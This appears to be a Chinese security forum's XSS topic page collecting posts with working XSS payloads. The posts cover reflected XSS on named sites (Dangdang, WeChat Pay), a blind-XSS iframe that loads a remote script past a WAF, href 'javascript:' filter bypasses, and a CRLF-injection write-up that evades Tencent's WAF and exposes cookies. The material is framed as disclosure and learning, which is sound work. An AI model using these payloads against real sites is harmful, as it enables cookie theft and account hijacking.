xss

xss

某网主站搜索框处的宽字节XSS

渗透实战分享朽木 发表了文章 • 64 个评论 • 928 次浏览 • 2017-03-19 17:22 • 来自相关话题

当当网主站的搜索框处。输入123<>"'abc,观察其输出点。










前几个输出点
发现做了实体编码处理,可能是htmlspecialchars。
观察其页面编码,是GB2312,为后文做铺垫。





重点在这,发现其对<>"'都做了转义处理,应该用的是正则。addslashes不会转义<>
由于网页编码是GB系列,结合宽字节,进行绕过~









盒子给了11积分。。
  查看全部
当当网主站的搜索框处。输入123<>"'abc,观察其输出点。

1.png

2.png


前几个输出点
发现做了实体编码处理,可能是htmlspecialchars。
观察其页面编码,是GB2312,为后文做铺垫。
3.png


重点在这,发现其对<>"'都做了转义处理,应该用的是正则。addslashes不会转义<>
由于网页编码是GB系列,结合宽字节,进行绕过~
4.png


5.png

盒子给了11积分。。
 

安全狗Xss检测一些遗漏的标签

Web安全渗透Mosuan 发表了文章 • 0 个评论 • 581 次浏览 • 2017-02-20 12:00 • 来自相关话题

这也是之前众测的时候碰到的安全狗,安全狗只拦截最基本的xss样本,img被拦截之后,试了下iframe就过了。
 
盲打:<iframe onload=s=createElement('script');body.appendChild(s);s.src='你的js地址'; width=0 height=0></iframe>
 





 
还有很多标签被遗忘了,或者说安全狗本来就不想做xss拦截的,只不过客户需求象征性的拦截了几个样本。 查看全部
这也是之前众测的时候碰到的安全狗,安全狗只拦截最基本的xss样本,img被拦截之后,试了下iframe就过了。
 
盲打:<iframe onload=s=createElement('script');body.appendChild(s);s.src='你的js地址'; width=0 height=0></iframe>
 

3D9292A0-997C-4563-8D0C-B884BE97AEDE.png

 
还有很多标签被遗忘了,或者说安全狗本来就不想做xss拦截的,只不过客户需求象征性的拦截了几个样本。

一次点到为止的在线直播教育网站的XSS

渗透实战分享秋彼岸 发表了文章 • 4 个评论 • 696 次浏览 • 2017-02-17 12:09 • 来自相关话题

0x001 前言

一次点到为止的在线直播教育网站的XSS

0x002 测试过程

0.漏洞位置:
       网站访问搜索结果内容页面时,在源代码中看到调用了wap页面的结果,
       通过wap页面连接测试到存在XSS。
1.搜索内容地址:
       www.xxxxx.com/lessons/groups/10732?....../
       1.1.页面源代码中调用到的地址:
       m.xxxxx.com/lessons/groups/11074?....../





2.打开这个连接,发现引用了搜索的内容,可以尝试构造:
   构造后地址:
m.xxxxx.com/lessons/groups/11074?groupName=%27)%20%20%0A%20alert(1688)%20%20;%0A%20//&amp;studyPhase=chuzhon




3.这个XSS仅限登入的账户能够触发(不同账号测试):




4.说明:
       测试点到为止

0x003 总结

原理:
       恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的;
修复:
       对参数进行过滤即可; 查看全部
0x001 前言


一次点到为止的在线直播教育网站的XSS


0x002 测试过程


0.漏洞位置
       网站访问搜索结果内容页面时,在源代码中看到调用了wap页面的结果,
       通过wap页面连接测试到存在XSS。
1.搜索内容地址
       www.xxxxx.com/lessons/groups/10732?....../
       1.1.页面源代码中调用到的地址
       m.xxxxx.com/lessons/groups/11074?....../

1.png


2.打开这个连接,发现引用了搜索的内容,可以尝试构造:
   构造后地址:
m.xxxxx.com/lessons/groups/11074?groupName=%27)%20%20%0A%20alert(1688)%20%20;%0A%20//&amp;studyPhase=chuzhon
2.png

3.这个XSS仅限登入的账户能够触发(不同账号测试):
3.png

4.说明:
       测试点到为止


0x003 总结


原理:
       恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的;
修复:
       对参数进行过滤即可;


gitlab存储Xss漏洞

渗透测试Mosuan 发表了文章 • 4 个评论 • 510 次浏览 • 2017-02-16 16:07 • 来自相关话题

https://hackerone.com/reports/200693
https://hackerone.com/reports/205497
 
昨天逛hackerone看到的,觉得有点意思就测试了下。
第一个url那个例子演示下
新建一个文件README.rdoc
写入payload:XSS[JaVaScriPt:alert(1)] <-- click to test
更新到gitlab(www.gitlab.com的修复了,我用xx搭建的gitlab试的)弹窗图:





 
我感觉应该还会有很多类似的xss。
  查看全部
https://hackerone.com/reports/200693
https://hackerone.com/reports/205497
 
昨天逛hackerone看到的,觉得有点意思就测试了下。
第一个url那个例子演示下
新建一个文件README.rdoc
写入payload:XSS[JaVaScriPt:alert(1)] <-- click to test
更新到gitlab(www.gitlab.com的修复了,我用xx搭建的gitlab试的)弹窗图:

1111111.png

 
我感觉应该还会有很多类似的xss。
 

记一次跨站绕过腾讯过滤弹窗

渗透测试Mosuan 发表了文章 • 6 个评论 • 492 次浏览 • 2017-02-13 17:26 • 来自相关话题

我在查看赛克艾威社区流量的时候看到有公众号跳转到我们平台,我试了下跳转到我的博客http://www.0aa.me但是发现被拦截了,审核元素看了下发现拦截页面有很多我博客的url。具体看附件。
我在查看赛克艾威社区流量的时候看到有公众号跳转到我们平台,我试了下跳转到我的博客http://www.0aa.me但是发现被拦截了,审核元素看了下发现拦截页面有很多我博客的url。具体看附件。

Xss测试样本

Web安全渗透Mosuan 发表了文章 • 6 个评论 • 544 次浏览 • 2016-12-16 15:22 • 来自相关话题

<figure onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</figure>

<footer onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</footer> 
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)">Test</a>https://randywestergren.com/persistent-xss-verizons-webmail-client/   在这里看到的 查看全部
<figure onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</figure>

<footer onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</footer>
 
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)">Test</a>
https://randywestergren.com/persistent-xss-verizons-webmail-client/   在这里看到的

a标签的href属性Xss的多种bypass场景

Web安全渗透Mosuan 发表了文章 • 8 个评论 • 1445 次浏览 • 2016-11-28 15:33 • 来自相关话题

iframe的src也一样。
 
有不同的姿势可以说出来,大家一起讨论啊。
 
0x01:过滤了冒号,可以用实体编码绕过!
javascript&colon;alert(10)
 
0x02:Javascript变种!
Javascript:alert(1)//大小写绕过。
java&Tab;script:confirm(11)//实体编码
javasc&NewLine;ript&colon;alert(1)//实体编码

0x03:不出现javascript or script!
data:text/html;base64,PHNjcmlwdD5hbGVydCgiMSIpPC9zY3JpcHQ+ //利用data伪协议

0x04:冒号后面不连接字符!
javascript:%0dalert(1)
 
0x05:href必须带着url!
javascript:alert(1)//http://www.0aa.me  //利用注释
javascript:%0dhttp://www.0aa.me%0dalert(1)  //不能用注释的情况下
 
0x06:不能注释!
javascript:alert(1)%0daaadafa
 
0x07:协议后面必须跟着网站!
javascript://www.0aa.me%0dalert(1)
 
0x08:过滤括号!
javascript:alert`1`
javascript:`${alert `0aa.me`}`
javascript:alert&lpar;1&rpar;

0x09:只过滤一次!
javasjavascript:cript:alert(1)

常用xss测试代码:
"'%&#></script><p class="onmouseover=" onmouseover="xx" onxxx="">xxx</p> 查看全部
iframe的src也一样。
 
有不同的姿势可以说出来,大家一起讨论啊。
 
0x01:过滤了冒号,可以用实体编码绕过!
javascript&colon;alert(10)
 
0x02:Javascript变种!
Javascript:alert(1)//大小写绕过。
java&Tab;script:confirm(11)//实体编码
javasc&NewLine;ript&colon;alert(1)//实体编码

0x03:不出现javascript or script!
data:text/html;base64,PHNjcmlwdD5hbGVydCgiMSIpPC9zY3JpcHQ+ //利用data伪协议

0x04:冒号后面不连接字符!
javascript:%0dalert(1)
 
0x05:href必须带着url!
javascript:alert(1)//http://www.0aa.me  //利用注释
javascript:%0dhttp://www.0aa.me%0dalert(1)  //不能用注释的情况下
 
0x06:不能注释!
javascript:alert(1)%0daaadafa
 
0x07:协议后面必须跟着网站!
javascript://www.0aa.me%0dalert(1)
 
0x08:过滤括号!
javascript:alert`1`
javascript:`${alert `0aa.me`}`
javascript:alert&lpar;1&rpar;

0x09:只过滤一次!
javasjavascript:cript:alert(1)

常用xss测试代码:
"'%&#></script><p class="onmouseover=" onmouseover="xx" onxxx="">xxx</p>

【转载】CRLF Injection and Bypass Tencent WAF

Web安全渗透Mosuan 发表了文章 • 3 个评论 • 512 次浏览 • 2016-11-25 16:14 • 来自相关话题

转自:http://zhchbin.github.io/2016/01/31/CRLF-Injection-and-Bypass-WAF/
 前言

这是一篇关于HTTP Response Split(CRLF Injection)漏洞的及绕过腾讯WAF导致前端出现XSS的实例分析,个人觉得在这个过程中能学到点知识,因此整理出来分享一下,如果不感兴趣记得及时关闭页面。
 
关于HRS问题
 我们都知道,HTTP协议是依靠两个CRLF,即\r\n来分割HTTP头部及响应体。基于这个认知,可以推出,HRS问题是由于服务端程序没有过滤掉头部中的特殊字符%0D%0A,直接输出到了返回的数据中,导致错误的解析。而在日常开发中,最常见的莫过于有以下的两种功能(1)URL跳转(2)Cookie的设置中出现。接下来的小节里,将会以一个Cookie实例作来说明这个问题的危害。实例在:http://wooyun.org/bugs/wooyun-2016-0173904 ,目前腾讯已经修复了。
 
接口说明
 这个接口在大家使用微信红包的过程中都用过,我用xxx.com代表接口的域名,具体接口的功能我就先不说,虽然危害不大。接口如下:
https://xxx.com/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a返回
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:08:28 GMT
Content-Type: text/html; charset=gbk
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a; Domain=xxx.com; Path=/; Expires=Sun, 31-Jan-2016 12:08:28 GMT
在微信端这个接口其实没有什么问题,因为微信客户端会把这个参数替换掉,因此攻击者填入的参数就会被直接去掉,然而在浏览器中,却导致了XSS。
 
一步一个脚印
 
0x00 插入img标签
 从上面接口的返回数据中,可以看到pass_ticket参数的值出现在了Set-Cookie头部中,我们先试试能不能用插入两个CRLF,然后插入img标签。
exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
然而这个请求返回了空,浏览器根本不去解析body里的内容。不能放弃,通过curl分析一下,发现其实后端并没有过滤,请求都返回了,只是Content-Length为0导致浏览器认为Body为空,使用命令curl -kv <url>可以看到以下的错误提示。
* Excess found in a non pipelined read: excess = 84 url =
/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
(zero-length body)知道问题之后,我们下一步就是想方法让Content-Length的值不为0!试着在头部插入Content-Length: 60,得到以下的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%3E
浏览器里访问,bingo,图片出现了!
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:15:03 GMT
Content-Type: text/html; charset=gbk
Content-Length: 60
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a

<img src=1>; Domain=wx.tenpay.com; Path=/; Expires=Sun, 31-J





 
0x01 尝试执行脚本
 能够插入img标签之后,我半生不熟的前端知识告诉我,src=1,图片肯定会加载失败,失败了就会有onerror的事件发生。于是,试试下面的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%20onerror=alert(1)%3E
事实告诉我们,现实并没有想象中的美好,服务器直接返回了501,这是什么原因导致的?尝试几次之后推断是被WAF拦截了。WAF是Web Application Firewall的缩写,我们的“恶意”请求被它检查出来。试了一下,发现在被和谐的的onerror和alert中间插入一些其他字符,就不会被拦截,例如:on\error=al\ert(1),然而这并没有什么卵用,因为这根本就不是合法的HTML属性。
 
0x02 Bypass WAF
 有WAF,就得考虑如何绕过,然而在确认了自己的认知范围里并没有绕过的方法后,我去请教了@mramydnei。以下是他提供的思路及Bypass WAF的例子:
大概原理就是:
[]插入Content-Type更改response中的charset[/][]选择一个字符集,保证该字符集中的某个字符或字符串会被浏览器忽略(也可以是unicode transform)[/][]将会被忽略的字符插入到被blacklist拦截的字符之间[/][]done[/]
exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=al%1B%28Jert%28document.domain%29%3E 
看到他的回复后,我只有一个想法:人要有敬畏之心!后来找了一下,在Chrome的Issue List找到了一些相关的讨论,https://crbug.com/114941
 
0x03 绕过浏览器的XSS过滤
 由于是反射型的XSS,Chrome里直接访问的时候会发现它拦截了脚本的执行,虽然在firefox里是可行的。从上面中的分析过程中,我们可以知道一个事情:可以在返回的头部的信息里插入任何头部信息!这看上去很赞,于是就想起了Chrome的XSS过滤是可以被关闭的,只要你返回的头部中带有X-XSS-Protection:0,构造URL如下:
 
?exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AX-XSS-Protection:0%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=%22al%1B%28Jert%28document.co%1B%28Jokie%29%22%3E
点击后可以看到页面弹出了用户的Cookie,好了。虽然我们的xxx.com只是它的某个子域,这里的Cookie却弹出了其他子域名的,为什么呢?因为前端用了document.domain = xx.com




最后说几句
 在这个过程中,你学到了什么呢?反思这个过程,我觉得是信息量好大。对于我们做开发的,我认为最重要的一点是,用户的输入都是不可信的(这句话已经被无数人说过无数次了应该)。另外我读了一下Python Web框架里的一些代码,发现有些框架已经帮我们处理掉部分问题,例如在Flask中调用设置Cookie的相关接口中,werkzeug会使用白名单的机制检查每个byte,如果发现恶意字符,则将输入的值中用双引号包围起来,同时还有转义一部分字符,具体代码在这里:https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/_internal.py#L222 。
 
放几个参考链接:
[]https://en.wikipedia.org/wiki/HTTP_response_splitting[/][]http://blog.bentkowski.info/2014/07/google-doodle-xss-actually-response.html[/][]http://drops.wooyun.org/papers/2466[/]
 
Mosuan题外话 学习需要低调点,需要有颗敬畏知识的心,人外有人,山外有山。 查看全部
转自:http://zhchbin.github.io/2016/01/31/CRLF-Injection-and-Bypass-WAF/
 前言

这是一篇关于HTTP Response Split(CRLF Injection)漏洞的及绕过腾讯WAF导致前端出现XSS的实例分析,个人觉得在这个过程中能学到点知识,因此整理出来分享一下,如果不感兴趣记得及时关闭页面。
 
关于HRS问题
 我们都知道,HTTP协议是依靠两个CRLF,即\r\n来分割HTTP头部及响应体。基于这个认知,可以推出,HRS问题是由于服务端程序没有过滤掉头部中的特殊字符%0D%0A,直接输出到了返回的数据中,导致错误的解析。而在日常开发中,最常见的莫过于有以下的两种功能(1)URL跳转(2)Cookie的设置中出现。接下来的小节里,将会以一个Cookie实例作来说明这个问题的危害。实例在:http://wooyun.org/bugs/wooyun-2016-0173904 ,目前腾讯已经修复了。
 
接口说明
 这个接口在大家使用微信红包的过程中都用过,我用xxx.com代表接口的域名,具体接口的功能我就先不说,虽然危害不大。接口如下:
https://xxx.com/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a
返回
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:08:28 GMT
Content-Type: text/html; charset=gbk
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a; Domain=xxx.com; Path=/; Expires=Sun, 31-Jan-2016 12:08:28 GMT
在微信端这个接口其实没有什么问题,因为微信客户端会把这个参数替换掉,因此攻击者填入的参数就会被直接去掉,然而在浏览器中,却导致了XSS。
 
一步一个脚印
 
0x00 插入img标签
 从上面接口的返回数据中,可以看到pass_ticket参数的值出现在了Set-Cookie头部中,我们先试试能不能用插入两个CRLF,然后插入img标签。
exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
然而这个请求返回了空,浏览器根本不去解析body里的内容。不能放弃,通过curl分析一下,发现其实后端并没有过滤,请求都返回了,只是Content-Length为0导致浏览器认为Body为空,使用命令curl -kv <url>可以看到以下的错误提示。
* Excess found in a non pipelined read: excess = 84 url = 
/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&pass_ticket=a%0d%0a%0d%0a%3Cimg%20src=1%3E
(zero-length body)
知道问题之后,我们下一步就是想方法让Content-Length的值不为0!试着在头部插入Content-Length: 60,得到以下的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%3E
浏览器里访问,bingo,图片出现了!
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 30 Jan 2016 12:15:03 GMT
Content-Type: text/html; charset=gbk
Content-Length: 60
Connection: keep-alive
Cache-Control: no-cache, must-revalidate
Set-Cookie: pass_ticket=a

<img src=1>; Domain=wx.tenpay.com; Path=/; Expires=Sun, 31-J

11111111111.png

 
0x01 尝试执行脚本
 能够插入img标签之后,我半生不熟的前端知识告诉我,src=1,图片肯定会加载失败,失败了就会有onerror的事件发生。于是,试试下面的URL
exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%20onerror=alert(1)%3E
事实告诉我们,现实并没有想象中的美好,服务器直接返回了501,这是什么原因导致的?尝试几次之后推断是被WAF拦截了。WAF是Web Application Firewall的缩写,我们的“恶意”请求被它检查出来。试了一下,发现在被和谐的的onerror和alert中间插入一些其他字符,就不会被拦截,例如:on\error=al\ert(1),然而这并没有什么卵用,因为这根本就不是合法的HTML属性。
 
0x02 Bypass WAF
 有WAF,就得考虑如何绕过,然而在确认了自己的认知范围里并没有绕过的方法后,我去请教了@mramydnei。以下是他提供的思路及Bypass WAF的例子:
大概原理就是:
    []插入Content-Type更改response中的charset[/][]选择一个字符集,保证该字符集中的某个字符或字符串会被浏览器忽略(也可以是unicode transform)[/][]将会被忽略的字符插入到被blacklist拦截的字符之间[/][]done[/]

exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=al%1B%28Jert%28document.domain%29%3E
 
看到他的回复后,我只有一个想法:人要有敬畏之心!后来找了一下,在Chrome的Issue List找到了一些相关的讨论,https://crbug.com/114941
 
0x03 绕过浏览器的XSS过滤
 由于是反射型的XSS,Chrome里直接访问的时候会发现它拦截了脚本的执行,虽然在firefox里是可行的。从上面中的分析过程中,我们可以知道一个事情:可以在返回的头部的信息里插入任何头部信息!这看上去很赞,于是就想起了Chrome的XSS过滤是可以被关闭的,只要你返回的头部中带有X-XSS-Protection:0,构造URL如下:
 
?exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AX-XSS-Protection:0%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=%22al%1B%28Jert%28document.co%1B%28Jokie%29%22%3E
点击后可以看到页面弹出了用户的Cookie,好了。虽然我们的xxx.com只是它的某个子域,这里的Cookie却弹出了其他子域名的,为什么呢?因为前端用了document.domain = xx.com
2222222222.png

最后说几句
 在这个过程中,你学到了什么呢?反思这个过程,我觉得是信息量好大。对于我们做开发的,我认为最重要的一点是,用户的输入都是不可信的(这句话已经被无数人说过无数次了应该)。另外我读了一下Python Web框架里的一些代码,发现有些框架已经帮我们处理掉部分问题,例如在Flask中调用设置Cookie的相关接口中,werkzeug会使用白名单的机制检查每个byte,如果发现恶意字符,则将输入的值中用双引号包围起来,同时还有转义一部分字符,具体代码在这里:https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/_internal.py#L222 。
 
放几个参考链接:
    []https://en.wikipedia.org/wiki/HTTP_response_splitting[/][]http://blog.bentkowski.info/2014/07/google-doodle-xss-actually-response.html[/][]http://drops.wooyun.org/papers/2466[/]

 
Mosuan题外话 学习需要低调点,需要有颗敬畏知识的心,人外有人,山外有山。

有什么奇葩的xss payload?

